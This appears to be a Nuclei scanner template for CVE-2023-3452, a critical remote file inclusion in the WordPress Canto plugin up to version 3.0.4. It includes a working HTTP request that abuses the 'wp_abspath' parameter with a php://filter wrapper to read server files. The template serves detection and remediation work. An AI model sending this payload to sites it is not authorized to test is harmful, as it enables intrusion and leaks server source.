id: CVE-2023-3452 info: name: WordPress Canto Plugin <= 3.0.4 - File Inclusion author: omarkurt severity: critical description: | Canto plugin for WordPress up to version 3.0.4 contains a remote file inclusion caused by the 'wp_abspath' parameter, letting unauthenticated attackers include and execute arbitrary remote code if allow_url_include is enabled, exploit requires allow_url_include to be enabled. impact: | Attackers can execute arbitrary remote code on the server, leading to full server compromise. remediation: | Update to the latest version of the Canto plugin, above 3.0.4, or disable allow_url_include in PHP configuration. reference: - https://www.exploit-db.com/exploits/51826 - https://www.wordfence.com/threat-intel/vulnerabilities/wordpress-plugins/canto/canto-304-unauthenticated-remote-file-inclusion - https://nvd.nist.gov/vuln/detail/CVE-2023-3452 classification: cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H cvss-score: 9.8 cve-id: CVE-2023-3452 epss-score: 0.87115 epss-percentile: 0.9946 cwe-id: CWE-98 metadata: verified: true max-request: 3 tags: cve,cve2023,wordpress,wp-plugin,canto,rfi,rce,unauth,critical flow: http(1) && http(2) http: - raw: - | GET /wp-content/plugins/canto/readme.txt HTTP/1.1 Host: {{Hostname}} matchers: - type: dsl dsl: - 'compare_versions(version, "<= 3.0.4")' internal: true extractors: - type: regex name: version part: body group: 1 regex: - '(?i)Stable tag:\s*([0-9.]+)' internal: true - raw: - | GET /wp-content/plugins/canto/includes/lib/download.php?wp_abspath=php://filter/convert.base64-encode/resource=/var/www/html HTTP/1.1 Host: {{Hostname}} matchers: - type: dsl dsl: - 'contains_all(body, "PD9waHAK", "V29yZFByZXNz")' - 'status_code == 200' condition: and # digest: 4a0a00473045022037da2b0c835ac3aab683410ae83bf0d0b790aaebd80ea0b14101a34a53375f15022100b3072f189cbba13c253fc86b8f477e12fda9662b04254f4c454c7f1b100f37ea:922c64590222798bb761d5b6d8e72950